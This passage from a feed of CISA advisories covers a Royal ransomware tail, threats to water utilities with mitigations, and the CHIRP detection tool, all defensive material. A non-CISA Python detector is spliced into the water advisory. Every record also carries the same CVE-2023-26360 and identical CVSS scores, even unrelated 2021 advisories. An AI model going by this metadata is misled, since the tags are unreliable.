Enable and enforce multifactor authentication.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-11-13T12:00:00", "type": "ics", "title": "#StopRansomware: Royal Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2023-11-13T12:00:00", "id": "AA23-061A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T12:58:38", "description": "### Summary\n\n_**Immediate Actions WWS Facilities Can Take Now to Protect Against Malicious Cyber Activity** \n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)._ \n_\u2022 If you use[ RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 __Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>)._ \n\u2022 _Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\n__**Note:** This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 9. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.__\n\nThis joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Environmental Protection Agency (EPA), and the National Security Agency (NSA) to highlight ongoing malicious cyber activity\u2014by both known and unknown actors\u2014targeting the information technology (IT) and operational technology (OT) networks, systems, and devices of [U.S. Water and Wastewater Systems (WWS) Sector facilities](<https://www.cisa.gov/water-and-wastewater-systems-sector>). This activity\u2014which includes attempts to compromise system integrity via unauthorized access\u2014threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities. **Note:** although cyber threats across [critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) are increasing, this advisory does not intend to indicate greater targeting of the WWS Sector versus others.\n\nTo secure WWS facilities\u2014including Department of Defense (DoD) water treatment facilities in the United States and abroad\u2014against the TTPs listed below, CISA, FBI, EPA, and NSA strongly urge organizations to implement the measures described in the Mitigations section of this advisory.\n\n### Technical Details\n\n### Threat Overview\n\n#### Tactics, Techniques, and Procedures\n\nWWS facilities may be vulnerable to the following common tactics, techniques, and procedures (TTPs) used by threat actors to compromise IT and OT networks, systems, and devices.\n\n * Spearphishing personnel to deliver malicious payloads, including ransomware [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566/>)]. 
\n * Spearphishing is one of the most prevalent techniques used for initial access to IT networks. Personnel and their potential lack of cyber awareness are a vulnerability within an organization. Personnel may open malicious attachments or links to execute malicious payloads contained in emails from threat actors that have successfully bypassed email filtering controls.\n * When organizations integrate IT with OT systems, attackers can gain access\u2014either purposefully or inadvertently\u2014to OT assets after the IT network has been compromised through spearphishing and other techniques.\n * Exploitation of internet-connected services and applications that enable remote access to WWS networks [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210/>)]. \n * For example, threat actors can exploit a Remote Desktop Protocol (RDP) service that is insecurely exposed to the internet to infect a network with ransomware. If RDP is used for process control equipment, the attacker could also compromise WWS operations. Note: the increased use of remote operations due to the COVID-19 pandemic has likely increased the prevalence of weaknesses associated with remote access.\n * Exploitation of unsupported or outdated operating systems and software. \n * Threat actors likely seek to take advantage of perceived weaknesses among organizations that either do not have\u2014or choose not to prioritize\u2014resources for IT/OT infrastructure modernization. WWS facilities tend to allocate resources to physical infrastructure in need of replacement or repair (e.g., pipes) rather than IT/OT infrastructure.\n * The fact that WWS facilities are inconsistently resourced municipal systems\u2014not all of which have the resources to employ consistently high cybersecurity standards\u2014may contribute to the use of unsupported or outdated operating systems and software.\n * Exploitation of control system devices with vulnerable firmware versions. 
\n * WWS systems commonly use outdated control system devices or firmware versions, which expose WWS networks to publicly accessible and remotely executable vulnerabilities. Successful compromise of these devices may lead to loss of system control, denial of service, or loss of sensitive data [[T0827](<https://collaborate.mitre.org/attackics/index.php/Technique/T0827>)].\n\n#### WWS Sector Cyber Intrusions\n\nCyber intrusions targeting U.S. WWS facilities highlight vulnerabilities associated with the following threats:\n\n * Insider threats, from current or former employees who retain credentials that should have been revoked\n * Ransomware attacks\n\nWWS Sector cyber intrusions from 2019 to 2021 include:\n\n * In August 2021, malicious cyber actors used Ghost variant ransomware against a California-based WWS facility. The ransomware variant had been in the system for about a month and was discovered when three supervisory control and data acquisition (SCADA) servers displayed a ransomware message.\n * In July 2021, cyber actors used remote access to introduce ZuCaNo ransomware onto a Maine-based WWS facility\u2019s wastewater SCADA computer. The treatment system was run manually until the SCADA computer was restored using local control and more frequent operator rounds.\n * In March 2021, cyber actors used an unknown ransomware variant against a Nevada-based WWS facility. The ransomware affected the victim\u2019s SCADA system and backup systems. 
The SCADA system provides visibility and monitoring but is not a full industrial control system (ICS).\n * In September 2020, personnel at a New Jersey-based WWS facility discovered potential Makop ransomware had compromised files within their system.\n * In March 2019, a former employee at a Kansas-based WWS facility unsuccessfully attempted to threaten drinking water safety by using his user credentials, which had not been revoked at the time of his resignation, to remotely access a facility computer.\n\n### Mitigations\n\nThe FBI, CISA, EPA, and NSA recommend WWS facilities\u2014including DoD water treatment facilities in the United States and abroad\u2014use a risk-informed analysis to determine the applicability of a range of technical and non-technical mitigations to prevent, detect, and respond to cyber threats.\n\n#### WWS Monitoring\n\nPersonnel responsible for monitoring WWS should check for the following suspicious activities and indicators, which may indicate threat actor activity:\n\n * Inability of WWS facility personnel to access SCADA system controls at any time, either entirely or in part.\n * Unfamiliar data windows or system alerts appearing on SCADA system controls and facility data screens that could indicate a ransomware attack.\n * Detection by SCADA system controls, or by water treatment personnel, of abnormal operating parameters\u2014such as unusually high chemical addition rates\u2014used in the safe and proper treatment of drinking water.\n * Access to SCADA systems by unauthorized individuals or groups, e.g., former employees and current employees not authorized/assigned to operate SCADA systems and controls.\n * Access to SCADA systems at unusual times, which may indicate that a legitimate user\u2019s credentials have been compromised.\n * Unexplained SCADA system restarts.\n * Unchanging parameter values that normally fluctuate.\n\n#### Remote Access Mitigations\n\nNote: The increased use of remote operations due to the COVID-19 
pandemic increases the necessity for asset owner-operators to assess the risk associated with enhanced remote access to ensure it falls within acceptable levels. \n\n * Require multi-factor authentication for all remote access to the OT network, including from the IT network and external networks.\n * Utilize [blocklisting and allowlisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>) to limit remote access to users with a verified business and/or operational need.\n * Ensure that all remote access technologies have logging enabled and regularly audit these logs to identify instances of unauthorized access.\n * Utilize manual start and stop features in place of always activated unattended access to reduce the time remote access services are running.\n * Audit networks for systems using remote access services. \n * Close unneeded network ports associated with remote access services (e.g., RDP \u2013 Transmission Control Protocol [TCP] Port 3389).\n * When configuring [access control for a host](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>), utilize custom settings to limit the access a remote party can attempt to acquire.\n\n#### Network Mitigations\n\n * Implement and ensure robust network segmentation between IT and OT networks to limit the ability of malicious cyber actors to pivot to the OT network after compromising the IT network. \n * Implement demilitarized zones (DMZs), firewalls, jump servers, and one-way communication diodes to prevent unregulated communication between the IT and OT networks.\n * Develop/update network maps to ensure a full accounting of all equipment that is connected to the network. \n * Remove any equipment from networks that is not required to conduct operations to reduce the attack surface malicious actors can exploit. 
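The WWS Monitoring indicators above (access by unauthorized or former users, access at unusual times, abnormal setpoints such as a very high chemical feed rate, unexplained restarts, and parameter values that stop fluctuating) and the Remote Access recommendation to log and regularly audit remote access are all mechanically checkable once the SCADA/HMI access and telemetry logs are collected. The following is an added example, not code from the advisory or from CISA: a small detector run over a constructed log. The log format, the tag names (naoh_feed_pct, turbidity_ntu), the authorized-user roster, the allowlisted jump-host addresses, the shift window, the safe dose range and the flatline run length are all assumptions chosen for illustration; a real deployment would pull these from the historian, the access-control system and the process engineer's limits.

```python
# Added example, not code from the CISA advisory: detection logic for the
# WWS Monitoring indicators and the remote-access audit-logging guidance,
# run over a constructed SCADA access/telemetry log. The log format, tag
# names, user roster, jump-host list and thresholds are all assumptions.
from collections import defaultdict
from datetime import datetime

# Constructed sample log. Fields: timestamp,event,user,source,detail
SAMPLE_LOG = '''
2021-07-12 08:05:12,LOGIN,operator1,10.10.5.21,hmi01
2021-07-12 08:07:40,SETPOINT,operator1,10.10.5.21,naoh_feed_pct=12.0
2021-07-12 08:10:00,READING,,plc01,turbidity_ntu=0.31
2021-07-12 08:15:00,READING,,plc01,turbidity_ntu=0.33
2021-07-12 08:20:00,READING,,plc01,turbidity_ntu=0.32
2021-07-12 23:41:03,LOGIN,jdoe_former,203.0.113.77,hmi01
2021-07-12 23:43:55,SETPOINT,jdoe_former,203.0.113.77,naoh_feed_pct=95.0
2021-07-12 23:50:00,READING,,plc01,turbidity_ntu=0.30
2021-07-12 23:55:00,READING,,plc01,turbidity_ntu=0.30
2021-07-13 00:00:00,READING,,plc01,turbidity_ntu=0.30
2021-07-13 00:05:00,READING,,plc01,turbidity_ntu=0.30
2021-07-13 00:06:30,RESTART,,scada01,unscheduled
'''

AUTHORIZED_USERS = {'operator1', 'operator2', 'supervisor'}  # assumed roster
ALLOWED_SOURCES = {'10.10.5.21', '10.10.5.22'}               # assumed jump hosts
SHIFT_HOURS = range(6, 18)                                     # assumed 06:00-17:59
SAFE_RANGES = {'naoh_feed_pct': (0.0, 30.0)}                   # assumed dose limits
FLATLINE_RUN = 4                        # identical consecutive readings to flag


def parse_log(text):
    # Parse the constructed CSV-style log into dicts with a real datetime.
    rows = []
    for line in text.strip().splitlines():
        ts, event, user, source, detail = line.split(',', 4)
        rows.append({'ts': datetime.strptime(ts, '%Y-%m-%d %H:%M:%S'),
                     'event': event, 'user': user, 'source': source,
                     'detail': detail})
    return rows


def detect(rows):
    # Return (indicator, time, subject) tuples, one per advisory indicator hit.
    alerts = []
    runs = defaultdict(list)  # tag -> run of consecutive identical readings
    for r in rows:
        when = r['ts'].strftime('%Y-%m-%d %H:%M')
        if r['event'] == 'LOGIN':
            # access by unauthorized individuals (e.g. former employees)
            if r['user'] not in AUTHORIZED_USERS:
                alerts.append(('UNAUTHORIZED_USER', when, r['user']))
            # remote access that did not come through an allowlisted jump host
            if r['source'] not in ALLOWED_SOURCES:
                alerts.append(('UNEXPECTED_SOURCE', when, r['source']))
            # access at unusual times: outside the shift window or on a weekend
            if r['ts'].hour not in SHIFT_HOURS or r['ts'].weekday() >= 5:
                alerts.append(('OFF_HOURS_ACCESS', when, r['user']))
        elif r['event'] == 'SETPOINT':
            # abnormal operating parameters, e.g. an unusually high chemical feed
            tag, value = r['detail'].split('=')
            low, high = SAFE_RANGES.get(tag, (float('-inf'), float('inf')))
            if not low <= float(value) <= high:
                alerts.append(('ABNORMAL_SETPOINT', when, r['detail']))
        elif r['event'] == 'READING':
            # unchanging values on a tag that normally fluctuates (frozen view)
            tag, value = r['detail'].split('=')
            run = runs[tag]
            if run and run[-1] != value:
                run.clear()
            run.append(value)
            if len(run) == FLATLINE_RUN:
                alerts.append(('FLATLINE', when, tag))
        elif r['event'] == 'RESTART' and r['detail'] != 'scheduled':
            # unexplained SCADA restarts (no maintenance window recorded)
            alerts.append(('UNEXPLAINED_RESTART', when, r['source']))
    return alerts


if __name__ == '__main__':
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(*alert)
```

On the constructed log the detector raises nothing for the day-shift operator and six findings for the night-time session: an unauthorized user from a non-allowlisted address outside shift hours, a sodium hydroxide feed setpoint far above the assumed safe range, a turbidity tag that stops changing after the setpoint change, and an unscheduled SCADA restart. Each finding maps to one bullet in the WWS Monitoring list; the point of emitting them as structured tuples rather than printed text is that they can go straight into a SIEM or ticketing queue for the operator to confirm against the physical process.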
\n\n#### Planning and Operational Mitigations\n\n * Ensure the organization\u2019s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and threats to safety. \n * The plan should also consider third parties with legitimate need for OT network access, including engineers and vendors.\n * Review, test, and update the emergency response plan on an annual basis to ensure accuracy.\n * Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications.\n * Allow employees to gain decision-making experience via [tabletop exercises](<https://www.cisa.gov/publication/cybersecurity-scenarios>) that incorporate loss of visibility and control scenarios. Utilize resources such as the Environmental Protection Agency\u2019s (EPA) [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>) as well as the Ransomware Response Checklist on p. 11 of the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### Safety System Mitigations\n\n * Install independent cyber-physical safety systems. These are systems that physically prevent dangerous conditions from occurring if the control system is compromised by a threat actor. \n * Examples of cyber-physical safety system controls include: \n * Size of the chemical feed pump\n * Gearing on valves\n * Pressure switches, etc.\n * These types of controls benefit WWS Sector facilities\u2014especially smaller facilities with limited cybersecurity capability\u2014because they enable facility staff to assess systems from a worst-case scenario and determine protective solutions. 
Enabling cyber-physical safety systems allows operators to take physical steps to limit the damage, for example, by preventing cyber actors, who have gained control of a sodium hydroxide pump, from raising the pH to dangerous levels.\n\n### Additional Mitigations\n\n * Foster an organizational culture of cyber readiness. See the [CISA Cyber Essentials](<https://www.cisa.gov/publication/cyber-essentials-toolkits>) along with the items listed in the Resources section below for guidance. \n * Update software, including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.\n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. \n * Implement regular data backup procedures on both the IT and OT networks. 
\n * Regularly test backups.\n * Keep backups offline, disconnected from the network, to prevent the potential spread of ransomware to the backups.\n * When possible, enable OT device authentication, utilize the encrypted version of OT protocols, and encrypt all wireless communications to ensure the confidentiality and authenticity of process control data in transit.\n * Employ user account management to: \n * Remove, disable, or rename any default system accounts wherever possible.\n * Implement account lockout policies to reduce risk from brute-force attacks.\n * Monitor the creation of administrator-level accounts by third-party vendors, backed by robust privileged account management policies and procedures.\n * Implement a user account policy that includes set durations for deactivation and removal of accounts after employees leave the organization or after accounts reach a defined period of inactivity.\n * Implement execution-prevention controls, such as application allowlisting and software restriction policies, that prevent programs from executing from common ransomware staging locations, such as the temporary folders used by popular internet browsers.\n * Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of users exhibiting unusual activity.\n\nFBI, CISA, EPA, and NSA would like to thank Dragos as well as the WaterISAC for their contributions to this advisory.\n\n### Resources\n\n#### Cyber Hygiene Services\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. 
\n\n#### Rewards for Justice Reporting\n\nThe U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ website](<https://rewardsforjustice.net/english/malicious_cyber_activity.html>) for more information and how to report information securely.\n\n#### StopRansomware.gov \n\nThe [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) webpage is an interagency resource that provides guidance on ransomware protection, detection, and response. This includes ransomware alerts, reports, and resources from CISA and other federal partners, including:\n\n * CISA and MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>)\n * CISA Insights: [Ransomware Outbreak](<https://www.cisa.gov/blog/2019/08/21/cisa-insights-ransomware-outbreak-0>)\n * CISA Webinar: [Combating Ransomware](<https://www.youtube.com/watch?v=D8kC07tu27A>)\n\n### Additional Resources\n\nFor additional resources that can assist in preventing and mitigating this activity, see:\n\n * FBI-CISA-EPA-MS-ISAC Joint CSA: [Compromise of U.S. 
Water Treatment Facility](<https://us-cert.cisa.gov/ncas/alerts/aa21-042a>)\n * WaterISAC: [15 Cybersecurity Fundamentals for Water and Wastewater Utilities](<https://www.waterisac.org/fundamentals>)\n * American Water Works Association: [Cybersecurity Guidance and Assessment Tool](<https://www.awwa.org/Resources-Tools/Resource-Topics/Risk-Resilience/Cybersecurity-Guidance>)\n * EPA: [Cybersecurity Incident Action Checklist](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: [Cybersecurity Best Practices for the Water Sector](<https://www.epa.gov/waterriskassessment/epa-cybersecurity-best-practices-water-sector>)\n * EPA: Supporting Cybersecurity Measures with the [Clean Water](<https://www.epa.gov/cwsrf>) and [Drinking Water](<https://www.epa.gov/dwsrf>) State Revolving Funds\n * CISA: [Cyber Risks & Resources for the Water and Wastewater Systems Sector](<https://www.cisa.gov/ncf-water>) infographic\n * CISA: [Critical ICS Cybersecurity Performance Goals and Objectives](<https://www.cisa.gov/control-systems-goals-and-objectives>)\n * CISA Fact Sheet: [Rising Ransomware Threat to Operational Technology Assets](<https://www.cisa.gov/publication/ransomware-threat-to-ot>)\n * CISA-MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>)\n * NSA CSA: [Stop Malicious Cyber Activity Against Connected OT](<https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/1/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF>)\n * CISA: [Insider Threat Mitigation Resources](<https://www.cisa.gov/publication/insider-threat-mitigation-resources>)\n * NIST: [Special Publication (SP) 800-167, Guide to Application Whitelisting](<https://csrc.nist.gov/News/2015/NIST-Release-of-SP-800-167,-Guide-to-Application-W>)\n * NIST: [SP 800-82 Rev. 
2, Guide to Industrial Control Systems (ICS) Security (Section 6.2.1)](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>)\n\n### Disclaimer of Endorsement \n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. \n\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### Revisions\n\nInitial Version: October 14, 2021|October 25, 2021: Corrected typo in Additional Resources\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-10-25T12:00:00", "type": "ics", "title": "Ongoing Cyber Threats to U.S. Water and Wastewater Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-10-25T12:00:00", "id": "AA21-287A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-287a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:02:22", "description": "### Summary\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). 
Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:\n\n * AA20-352A: [Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>), which primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.\n * AA21-008A: [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>), which addresses APT activity within Microsoft 365/Azure environments and offers an overview of\u2014and guidance on\u2014available open-source tools. 
The Alert includes the [CISA-developed Sparrow tool ](<https://github.com/cisagov/Sparrow>)that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.\n\nSimilar to [Sparrow](<https://github.com/cisagov/Sparrow>)\u2014which scans for signs of APT compromise within an M365 or Azure environment\u2014CHIRP scans for signs of APT compromise within an on-premises environment.\n\nIn this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.\n\nCHIRP is freely available on the [CISA GitHub Repository](<https://github.com/cisagov>). For additional guidance watch CISA's [CHIRP Overview video](<https://www.youtube.com/watch?v=UGYSNiNOpds>). **Note:** CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.\n\nCISA advises organizations to use CHIRP to:\n\n * Examine Windows event logs for artifacts associated with this activity;\n * Examine Windows Registry for evidence of intrusion;\n * Query Windows network artifacts; and\n * Apply YARA rules to detect malware, backdoors, or implants.\n\nNetwork defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. 
**Note**: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n### Technical Details\n\n#### How CHIRP Works\n\nCHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts [AA20-352A](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>) and [AA21-008A](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n\nCurrently, the tool looks for:\n\n * The presence of malware identified by security researchers as [TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>) and RAINDROP;\n * Credential dumping certificate pulls;\n * Certain persistence mechanisms identified as associated with this campaign;\n * System, network, and M365 enumeration; and\n * Known observable indicators of lateral movement.\n\nNetwork defenders can follow step-by-step instructions on the [CISA CHIRP GitHub repository](<https://github.com/cisagov/CHIRP>) to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.\n\n#### Compatibility\n\nCHIRP currently only scans Windows operating systems.\n\n#### Instructions\n\nCHIRP is available on CISA\u2019s GitHub repository in two forms:\n\n 1. A compiled executable\n\n 2. A Python script\n\nCISA recommends using the compiled version to easily scan a system for APT activity. 
For instructions to run, read the README.md in the CHIRP GitHub repository.\n\nIf you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.\n\n### Mitigations\n\n#### Interpreting the Results\n\nCHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n#### **Frequently Asked Questions**\n\n 1. **What systems should CHIRP run on?**\n\nSystems running SolarWinds Orion or believed to be involved in any resulting lateral movement.\n\n 2. **What should I do with results?**\n\nIngest the JSON results into a SIEM system, web browser, or text editor.\n\n 3. **Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?** \n\n 1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.\n\n 2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. 
CHIRP provides a complementary capability to Sparrow by scanning on-premises systems for similar activity.\n\n 4. **How often should I run CHIRP?**\n\nCHIRP can be run once or routinely. Currently, CHIRP does not itself provide a scheduling mechanism for repeated runs.\n\n 5. **Do I need to configure the tool before I run it?**\n\nNo.\n\n 6. **Will CHIRP change or affect anything on the system(s) it runs on?**\n\nNo, CHIRP only scans the system(s) it runs on and makes no active changes.\n\n 7. **How long will it take to run CHIRP?**\n\nCHIRP will complete its scan in approximately 1 to 2 hours. Duration will depend on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.\n\n 8. **If I have questions, who do I contact?**\n\nFor general questions regarding CHIRP, please contact CISA via email at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at <https://us-cert.cisa.gov/report>. For all technical issues or support for CHIRP, please submit issues at the [CISA CHIRP GitHub Repository](<https://github.com/cisagov/CHIRP>). 
\n\n### Revisions\n\nMarch 18, 2021: Initial Publication |April 9, 2021: Fixed PDF (not related to content)|April 15, 2021: Updated with Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-04-15T12:00:00", "id": "AA21-077A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-077a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:02:27", "description": "### Summary\n\n_This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 8. 
